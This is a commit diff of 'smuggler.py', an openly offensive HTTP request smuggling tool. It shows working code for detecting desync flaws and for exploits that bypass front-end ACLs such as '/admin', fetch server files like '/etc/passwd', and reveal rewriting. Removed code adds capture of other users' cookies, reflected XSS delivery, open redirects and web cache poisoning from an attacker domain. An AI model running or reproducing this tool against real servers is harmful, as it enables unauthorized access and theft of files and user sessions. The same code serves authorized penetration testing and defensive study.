瀏覽代碼

out-of-lab rebuild

epsylon 4 年之前
父節點
當前提交
ce322f6e82
共有 2 個文件被更改,包括 156 次插入438 次删除
  1. 23 39
      payloads/payloads.py
  2. 133 399
      smuggler.py

文件差異過大導致無法顯示
+ 23 - 39
payloads/payloads.py


+ 133 - 399
smuggler.py

@@ -9,8 +9,8 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import sys, socket, ssl
 
-VERSION = "v0.1_beta"
-RELEASE = "25_04_2020"
+VERSION = "v:0.2b"
+RELEASE = "27042020"
 SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
 SOURCE2 = "https://github.com/epsylon/smuggler"
 CONTACT = "epsylon@riseup.net - (https://03c8.net)"
@@ -24,7 +24,7 @@ except:
 VULNERABLE_LIST = []
 
 def set_target():
-    target = input("\n  + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower()
+    target = input("\n  + Enter TARGET (ex: 'http(s)://www.evilcorp.com'): ").lower()
     if target.startswith("http://"):
         target = target.replace("http://","")
         port = 80
@@ -34,25 +34,30 @@ def set_target():
         port = 443
         SSL = True
     else:
+        print("\n"+"-"*45)
         print("\n[Error] Target is invalid: '"+str(target)+"'\n")
-        print("="*50)
+        print("-"*45)
         sys.exit()
-    method = input("\n  + Enter HTTP Method (ex: POST): ").upper()
+    method = input("\n  + Enter HTTP METHOD (default: 'POST'): ").upper()
     if method == "GET" or method == "POST":
         pass
     else:
-        print("\n[Error] Method is invalid: '"+str(method)+"'\n")
-        print("="*50)
-        sys.exit()
-    path = input("\n  + Enter PATH (ex: '/'): ")
+        if method == "":
+            method = "POST"
+        else:
+            print("\n"+"-"*45)
+            print("\n[Error] Method is invalid: '"+str(method)+"'\n")
+            print("-"*45)
+            sys.exit()
+    path = input("\n  + Enter PATH (default: '/'): ")
     if path == "":
         path = "/"
     return target, port, SSL, method, path
 
-def detect(): # detect menu
+def detect(final): # detect menu
     target, port, SSL, method, path = set_target() # set target
     print("\n"+"="*50 + "\n")
-    print("[Info] Starting HTTP Smuggling detection ...")
+    print("[Info] Starting -HTTP Smuggling- Timing detection ...")
     payloads_dsync = payloads.payloads.payloads # load payloads
     addr = (target, port)
     print("")
@@ -66,7 +71,11 @@ def detect(): # detect menu
         print("+ PAYLOAD:\n")
         print(payload)
         send_payload(attack_type, payload, addr, SSL) # send each payload
-    show_results(target, port, method, path) # show final results
+    if final == True:
+        show_final_results(target, port, method, path, final)
+    else:
+        t, p, m, pt = show_final_results(target, port, method, path, final)
+        return t, p, m, pt, SSL
 
 def send_payload(attack_type, payload, addr, SSL):
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@@ -85,7 +94,7 @@ def send_payload(attack_type, payload, addr, SSL):
         if SSL == True: # ssl
             ss.close()
         return
-    for i in range(1,20): # 20x tests
+    for i in range(0,10): # x10 tests
         if SSL == True: # ssl
             ss.send(payload.encode('utf-8'))
         else:
@@ -105,13 +114,11 @@ def send_payload(attack_type, payload, addr, SSL):
     resp=""
     wait=False
     for line in datas.split('\n'):
-        if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'):
-            wait=True
-        elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'):
-            wait=True
-        elif line.startswith('HTTP/1.1 '):
+        if "502" in line or "404" in line or "405" in line:
             wait=False
             resp_c+=1
+        else:
+            wait=True
         if not wait:
             resp += line+'\n'
     print("-"*45)
@@ -125,24 +132,20 @@ def send_payload(attack_type, payload, addr, SSL):
     if SSL == True: # ssl
         ss.close()
 
-def show_results(target, port, method, path):
+def show_final_results(target, port, method, path, final):
     print("="*50)
-    print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n")
+    print("\n+ Detection RESULT: -HTTP Smuggling- Timing Attack\n")
     print("-"*45+"\n")
     print("  - TARGET: "+str(target)+":"+str(port))
     print("  - Method: "+str(method))
     print("  - Path  : "+str(path))
-    CLCL = False
     TETE = False
     TECL = False
-    CLTE = False 
+    CLTE = False
     if VULNERABLE_LIST: 
         print("\n  - STATUS: [ VULNERABLE !!! ]\n")
         for v in VULNERABLE_LIST: # resume vulnerable payloads found
-            if v.startswith("CL-CL") and CLCL == False: # CL-CL
-                print("    * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]")
-                CLCL = True
-            elif v.startswith("TE-TE") and TETE == False: # TE-TE
+            if v.startswith("TE-TE") and TETE == False: # TE-TE
                 print("    * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]")
                 TETE = True
             elif v.startswith("TE-CL") and TECL == False: # TE-CL
@@ -155,26 +158,22 @@ def show_results(target, port, method, path):
                 pass
     else:
         print("\n  - STATUS: [ NOT VULNERABLE ]")
+        print("\n"+"="*50+"\n")
+        sys.exit() # exit when not vulnerable!
+    if final == False: # keep exploiting
+        return target, port, method, path
     print("\n"+"="*50+"\n")
 
 def exploit(): # exploit menu
-    exploit = input("\n+ SELECT EXPLOIT:\n\n  (0) Steal files (ex: '/etc/passwd')\n  (1) Bypass Front-End Security Controls\n  (2) Reveal Front-End Rewriting\n  (3) Capture Users Requests\n  (4) Re-Exploit a XSS Reflected\n  (5) Turn into an Open-Redirect\n  (6) Web Cache Poisoning\n  (7) Web Cache Deception\n\n")
-    if exploit == "0": # steal files
-        exploit_steal()
-    elif exploit == "1": # bypass front-end
-        exploit_bypass()
-    elif exploit == "2": # reveal front-edn rewriting
+    exploit = input("\n+ SELECT EXPLOIT:\n\n  (0) Verify Reading (Back-End)\n  (1) Reveal Rewriting (Front-End)\n  (2) Bypass ACLs (Front-End)\n  (3) Fetch Files (Back-End)\n\n")
+    if exploit == "0": # verify acccess (back-end)
+        exploit_verify()
+    elif exploit == "1": # reveal (front-end)
         exploit_reveal()
-    elif exploit == "3": # capture users requests
-        exploit_capture()
-    elif exploit == "4": # re-exploit xss reflection
-        exploit_xss()
-    elif exploit == "5": # turn into open-redirect 'zombie'
-        exploit_openredirect()
-    elif exploit == "6": # webcache poisoning
-        exploit_poison()
-    elif exploit == "7": # webcache deception
-        exploit_deception()
+    elif exploit == "2": # bypass (front-end)
+        exploit_bypass()
+    elif exploit == "3": # fetch files (back-end)
+        exploit_steal()
     else: # exit
         print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
         sys.exit()
@@ -196,10 +195,11 @@ def send_exploit(addr, SSL, exploit):
         if SSL == True: # ssl
             ss.close()
         return
-    if SSL == True: # ssl
-        ss.send(exploit.encode('utf-8'))
-    else:
-        s.send(exploit.encode('utf-8'))
+    for i in range(0,2): # send exploit twice
+        if SSL == True: # ssl
+            ss.send(exploit.encode('utf-8'))
+        else:
+            s.send(exploit.encode('utf-8'))
     datas=""
     while 1:
         if SSL == True: # ssl
@@ -212,407 +212,137 @@ def send_exploit(addr, SSL, exploit):
     print("\n+ REPLY:\n")
     print(str(datas))
 
-def exploit_bypass():
+def exploit_verify():
     print("\n"+"="*50 + "\n")
-    print("[Info] Trying to Bypass Front-End Security Controls...")
-    target, port, SSL, method, path = set_target() # set target
+    print("[Info] Trying to verify injections (generating Back-End errors)...")
+    target, port, method, path, SSL = detect(False) # set target
     addr = (target, port)
-    restricted_path = input("\n  + Enter RESTRICTED ZONE (ex: '/admin'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '50'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 50
-    if not content_length:
-        content_length = 50
+    print("\n"+"-"*45)
     exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 1 TE-CL
-                    exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 1 CL-TE
-                    exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 1 TE-TE
-                    exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 1 CL-CL
-                    exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
-            else: # send all!
+    smuggled_method = payloads.payloads.methods # load methods
+    for v in VULNERABLE_LIST:
+        for exp in exploits_dsync:
+            if exp.split("#")[0] in v:
+                for s in smuggled_method:
+                    if s.split("#")[0] == "0": # verify reading
+                        s = s.replace("$method", method)
+                        s = s.replace("$path", path)
+                        s = s.replace("$target", target)
+                        smuggled = s.split("#")[1]
                 exploit = exp.split("#")[1]
                 exploit = exploit.replace("$method", method)
                 exploit = exploit.replace("$path", path)
                 exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$restricted_path", restricted_path)
+                content_length = 5
                 exploit = exploit.replace("$CL", str(content_length))
+                exploit = exploit.replace("$SMUGGLED", smuggled)
                 print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0])+"] \n")
                 print(str(exploit))
                 send_exploit(addr, SSL, exploit) # send expoit
 
-def exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$restricted_path", restricted_path)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
 def exploit_reveal():
     print("\n"+"="*50 + "\n")
-    print("[Info] Trying to Reveal Front-End Rewriting...")
-    target, port, SSL, method, path = set_target() # set target
+    print("[Info] Trying to reveal Front-End rewriting...")
+    target, port, method, path, SSL = detect(False) # set target
     addr = (target, port)
-    parameter = input("\n  + Enter PARAMETER reflected (ex: 'user'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 130
-    if not content_length:
-        content_length = 130
+    print("\n"+"-"*45)
+    parameter = input("\n  + Enter PARAMETER reflected (ex: 'q', '_username', ...): ")
     exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 2 TE-CL
-                    exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 2 CL-TE
-                    exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 2 TE-TE
-                    exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 2 CL-CL
-                    exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
-            else: # send all!
+    smuggled_method = payloads.payloads.methods # load methods
+    for v in VULNERABLE_LIST:
+        for exp in exploits_dsync:
+            if exp.split("#")[0] in v:
+                for s in smuggled_method:
+                    if s.split("#")[0] == "1": # reveal rewriting
+                        s = s.replace("$method", method)
+                        s = s.replace("$path", path)
+                        s = s.replace("$target", target)
+                        s = s.replace("$parameter", parameter)
+                        content_length = len(parameter)+2+50
+                        s = s.replace("$CL", str(content_length))
+                        smuggled = s.split("#")[1]
                 exploit = exp.split("#")[1]
                 exploit = exploit.replace("$method", method)
                 exploit = exploit.replace("$path", path)
                 exploit = exploit.replace("$target", target)
                 exploit = exploit.replace("$parameter", parameter)
+                content_length = 5
                 exploit = exploit.replace("$CL", str(content_length))
+                exploit = exploit.replace("$SMUGGLED", smuggled)
                 print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-                print(str(exploit))
-                send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$parameter", parameter)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_capture():
-    print("\n"+"="*50 + "\n")
-    print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...")
-    target, port, SSL, method, path = set_target() # set target
-    addr = (target, port)
-    parameters = input("\n  + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ")
-    cookie    = input("\n  + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 130
-    if not content_length:
-        content_length = 130
-    exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 3 TE-CL
-                    exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 3 CL-TE
-                    exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 3 TE-TE
-                    exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 3 CL-CL
-                    exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
-            else: # send all!
-                exploit = exp.split("#")[1]
-                exploit = exploit.replace("$method", method)
-                exploit = exploit.replace("$path", path)
-                exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$parameters", parameters)
-                exploit = exploit.replace("$cookie", cookie)
-                exploit = exploit.replace("$CL", str(content_length))
-                print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-                print(str(exploit))
-                send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$parameters", parameters)
-    exploit = exploit.replace("$cookie", cookie)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_xss():
-    print("\n"+"="*50 + "\n")
-    print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...")
-    target, port, SSL, method, path = set_target() # set target
-    addr = (target, port)
-    header = input("\n  + Enter VULNERABLE HEADER (ex: 'User-Agent'): ")
-    xss    = input("\n  + Enter XSS Injection (ex: '<script>alert(1)</script>'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 100
-    if not content_length:
-        content_length = 100
-    exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 4 TE-CL
-                    exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 4 CL-TE
-                    exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 4 TE-TE
-                    exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 4 CL-CL
-                    exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
-            else: # send all!
-                exploit = exp.split("#")[1]
-                exploit = exploit.replace("$method", method)
-                exploit = exploit.replace("$path", path)
-                exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$header", header)
-                exploit = exploit.replace("$xss", xss)
-                exploit = exploit.replace("$CL", str(content_length))
-                print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-                print(str(exploit))
-                send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$header", header)
-    exploit = exploit.replace("$xss", xss)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_openredirect():
-    print("\n"+"="*50 + "\n")
-    print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...")
-    target, port, SSL, method, path = set_target() # set target
-    addr = (target, port)
-    location = input("\n  + Enter NEW LOCATION (ex: 'otherwebsite.com'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 100
-    if not content_length:
-        content_length = 100
-    exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 5 TE-CL
-                    exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 5 CL-TE
-                    exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 5 TE-TE
-                    exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 5 CL-CL
-                    exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL)
-            else: # send all!
-                exploit = exp.split("#")[1]
-                exploit = exploit.replace("$method", method)
-                exploit = exploit.replace("$path", path)
-                exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$location", location)
-                exploit = exploit.replace("$CL", str(content_length))
-                print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0])+"] \n")
                 print(str(exploit))
                 send_exploit(addr, SSL, exploit) # send expoit
 
-def exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$location", location)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_poison():
+def exploit_bypass():
     print("\n"+"="*50 + "\n")
-    print("[Info] Trying to perform web cache poisoning...")
-    target, port, SSL, method, path = set_target() # set target
+    print("[Info] Trying to bypass Front-End ACLs...")
+    target, port, method, path, SSL = detect(False) # set target
     addr = (target, port)
-    location = input("\n  + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ")
-    script   = input("\n  + Enter POISON SOURCE (ex: '/static/defaced.js'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 100
-    if not content_length:
-        content_length = 100
+    print("\n"+"-"*45)
+    restricted = input("\n  + Enter RESTRICTED ZONE (ex: '/admin', /wp-admin/, ...): ")
     exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 6 TE-CL
-                    exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 6 CL-TE
-                    exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 6 TE-TE
-                    exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 6 CL-CL
-                    exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
-            else: # send all!
+    smuggled_method = payloads.payloads.methods # load methods
+    for v in VULNERABLE_LIST:
+        for exp in exploits_dsync:
+            if exp.split("#")[0] in v:
+                for s in smuggled_method:
+                    if s.split("#")[0] == "2": # bypass ACLs
+                        s = s.replace("$method", method)
+                        s = s.replace("$path", path)
+                        s = s.replace("$target", target)
+                        s = s.replace("$restricted", restricted)
+                        content_length = 10 # $CL method
+                        s = s.replace("$CL", str(content_length))
+                        smuggled = s.split("#")[1]
                 exploit = exp.split("#")[1]
                 exploit = exploit.replace("$method", method)
                 exploit = exploit.replace("$path", path)
                 exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$location", location)
-                exploit = exploit.replace("$script", script)
+                exploit = exploit.replace("$restricted", restricted)
+                content_length = 110 + len(restricted) # $template CL exploit + user path
                 exploit = exploit.replace("$CL", str(content_length))
+                exploit = exploit.replace("$SMUGGLED", smuggled)
                 print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0])+"] \n")
                 print(str(exploit))
                 send_exploit(addr, SSL, exploit) # send expoit
 
-def exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$location", location)
-    exploit = exploit.replace("$script", script)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_deception():
+def exploit_steal():
     print("\n"+"="*50 + "\n")
-    print("[Info] Trying to perform web cache deception leaking...")
-    target, port, SSL, method, path = set_target() # set target
+    print("[Info] Trying to fetch files (via Back-End) from server...")
+    target, port, method, path, SSL = detect(False) # set target
     addr = (target, port)
-    private = input("\n  + Enter RESTRICTED ZONE (ex: '/private/messages'): ")
-    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
-    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
-    try:
-        content_length = int(content_length)
-    except:
-        content_length = 100
-    if not content_length:
-        content_length = 100
+    print("\n"+"-"*45)
+    files = input("\n  + Enter FILE (ex: '/etc/passwd', '/server/config_db.php', ...): ")
     exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
-            if request_type == "TE-CL":
-                if "TE-CL" in exp: # exploit 7 TE-CL
-                    exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
-            elif request_type == "CL-TE":
-                if "CL-TE" in exp: # exploit 7 CL-TE
-                    exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
-            elif request_type == "TE-TE":
-                if "TE-TE" in exp: # exploit 7 TE-TE
-                    exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
-            elif request_type == "CL-CL":
-                if "CL-CL" in exp: # exploit 7 CL-CL
-                    exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
-            else: # send all!
+    smuggled_method = payloads.payloads.methods # load methods
+    for v in VULNERABLE_LIST:
+        for exp in exploits_dsync:
+            if exp.split("#")[0] in v:
+                for s in smuggled_method:
+                    if s.split("#")[0] == "3": # fetch files
+                        s = s.replace("$method", method)
+                        s = s.replace("$path", path)
+                        s = s.replace("$target", target)
+                        s = s.replace("$files", files)
+                        content_length = len(files)+2 # p=len(files)
+                        s = s.replace("$CL", str(content_length))
+                        smuggled = s.split("#")[1]
                 exploit = exp.split("#")[1]
                 exploit = exploit.replace("$method", method)
                 exploit = exploit.replace("$path", path)
                 exploit = exploit.replace("$target", target)
-                exploit = exploit.replace("$private", private)
+                exploit = exploit.replace("$files", files)
+                content_length = 1
                 exploit = exploit.replace("$CL", str(content_length))
+                exploit = exploit.replace("$SMUGGLED", smuggled)
                 print("\n"+"="*50+"\n")
-                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
+                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0])+"] \n")
                 print(str(exploit))
                 send_exploit(addr, SSL, exploit) # send expoit
 
-def exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL):
-    exploit = exp.split("#")[1]
-    exploit = exploit.replace("$method", method)
-    exploit = exploit.replace("$path", path)
-    exploit = exploit.replace("$target", target)
-    exploit = exploit.replace("$private", private)
-    exploit = exploit.replace("$CL", str(content_length))
-    print("\n"+"="*50+"\n")
-    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
-    print(str(exploit))
-    send_exploit(addr, SSL, exploit) # send expoit
-
-def exploit_steal():
-    print("\n"+"="*50 + "\n")
-    print("[Info] Trying to steal files from server...")
-    target, port, SSL, method, path = set_target() # set target
-    addr = (target, port)
-    files = input("\n  + Enter FILE (ex: '/etc/passwd'): ")
-    exploits_dsync = payloads.payloads.exploits # load exploits
-    for exp in exploits_dsync:
-        if "EXPLOIT-0" in exp: # extract exploit-0 (steal files)
-            exploit = exp.split("#")[1]
-            exploit = exploit.replace("$method", method)
-            exploit = exploit.replace("$path", path)
-            exploit = exploit.replace("$target", target)
-            exploit = exploit.replace("$files", files)
-            content_length = len(files)+2 # p=len(files)
-            exploit = exploit.replace("$CL", str(content_length))
-            print("\n"+"="*50+"\n")
-            print("+ PAYLOAD MODE: [CL-CL]\n")
-            print(str(exploit))
-            send_exploit(addr, SSL, exploit) # send expoit
-
 def print_banner():
     print("\n"+"="*50)
     print(" ____  __  __ _   _  ____  ____ _     _____ ____  ")
@@ -637,6 +367,10 @@ print_banner() # show banner
 option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
 print("\n"+"="*50)
 if option == "D": # detecting phase
-    detect()
-else: # trying to exploit
+    detect(True) # only detect
+elif option == "E": # trying to exploit
     exploit()
+else:
+    print("\n"+"-"*45+"\n")
+    print("[Smuggler by psy (https://03c8.net)]\n\n  Bye! ;-)\n")
+    sys.exit()